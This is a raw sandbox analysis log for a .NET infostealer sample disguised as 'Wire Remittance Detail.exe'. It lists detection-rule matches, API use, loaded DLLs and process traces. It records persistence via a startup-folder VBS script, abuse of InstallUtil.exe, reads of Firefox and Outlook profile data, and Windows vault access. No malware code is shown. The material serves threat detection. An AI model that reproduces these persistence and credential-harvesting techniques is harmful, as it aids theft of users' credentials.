Source: 5.2.AssemblyFullName.exe.4337120.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Wire Remittance Detail.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: AssemblyFullName.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Wire Remittance Detail.exe, ViewerReceiver.cs | Cryptographic APIs: 'CreateDecryptor'
Source: AssemblyFullName.exe.0.dr, ViewerReceiver.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Wire Remittance Detail.exe.42b3098.5.raw.unpack, ViewerReceiver.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, RsYAkkzVoy.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, Kqqzixk.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, xROdzGigX.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, ywes.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, iPVW0zV.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, 1Pi9sgbHwoV.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, YUgDfWK2g4.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Wire Remittance Detail.exe.44aee70.1.raw.unpack, YUgDfWK2g4.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@2/2
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs"
Source: Wire Remittance Detail.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Wire Remittance Detail.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Wire Remittance Detail.exe | Virustotal: Detection: 54%
Source: Wire Remittance Detail.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | File read: C:\Users\user\Desktop\Wire Remittance Detail.exe
Source: unknown | Process created: C:\Users\user\Desktop\Wire Remittance Detail.exe "C:\Users\user\Desktop\Wire Remittance Detail.exe"
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AssemblyFullName.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\AssemblyFullName.exe "C:\Users\user\AppData\Roaming\AssemblyFullName.exe"
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\AssemblyFullName.exe "C:\Users\user\AppData\Roaming\AssemblyFullName.exe"
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winsta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\Wire Remittance Detail.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: Wire Remittance Detail.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Wire Remittance Detail.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Wire Remittance Detail.exe | Static file information: File size 1129472 > 1048576
Source: Wire Remittance Detail.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x113200
Source: Wire Remittance Detail.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e | source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000041F0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb | source: Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004264000.00000004.00000800.00020000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1106231956.0000000005E50000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.00000000041C2000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.00000000041F0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq | source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb | source: Wire Remittance Detail.exe, 00000000.00000002.1105598136.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp, Wire Remittance Detail.exe, 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000415D000.00000004.00000800.00020000.00000000.sdmp, AssemblyFullName.exe, 00000005.00000002.1252075930.000000000411F000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: Wire Remittance Detail.exe, PortableEnumerator.cs | .Net Code: EnumerateBasicEnumerator System.AppDomain.Load(byte[])
Source: AssemblyFullName.exe.0.dr, PortableEnumerator.cs | .Net Code: EnumerateBasicEnumerator System.AppDomain.Load(byte[])
Source: 0.2.Wire Remittance Detail.exe.42b3098.5.raw.unpack, PortableEnumerator.cs | .Net Code: EnumerateBasicEnumerator System.AppDomain.Load(byte[])
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.Wire Remittance Detail.exe.5e50000.11.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, ListDecorator.cs | .Net Code: Read
Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
Source: 0.2.Wire Remittance Detail.exe.5bc0000.10.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.5b50000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.442f68a.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.5b50000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Wire Remittance Detail.exe.442f68a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1105377682.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1226380633.0000000003112000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1083367719.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1101766073.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1101766073.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Wire Remittance Detail.exe PID: 6892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AssemblyFullName.exe PID: 6916, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_01530C6D push edi; retf 2_2_01530C7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 2_2_01530CCC push edi; retf 2_2_01530C7A
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063F8937 push es; ret 5_2_063F8950
Source: C:\Users\user\AppData\Roaming\AssemblyFullName.exe | Code function: 5_2_063F255A push es; ret 5_2_063F256C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_00EE0C6D push edi; retf 6_2_00EE0C7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_062F34DA push es; retf 6_2_062F34E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_062F3A40 push FC063EDAh; retf 6_2_062F3A4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_0630FFB0 push es; ret 6_2_0630FFC0
Source: Wire Remittance Detail.exe | Static PE information: section name: .text entropy: 7.992784525923971
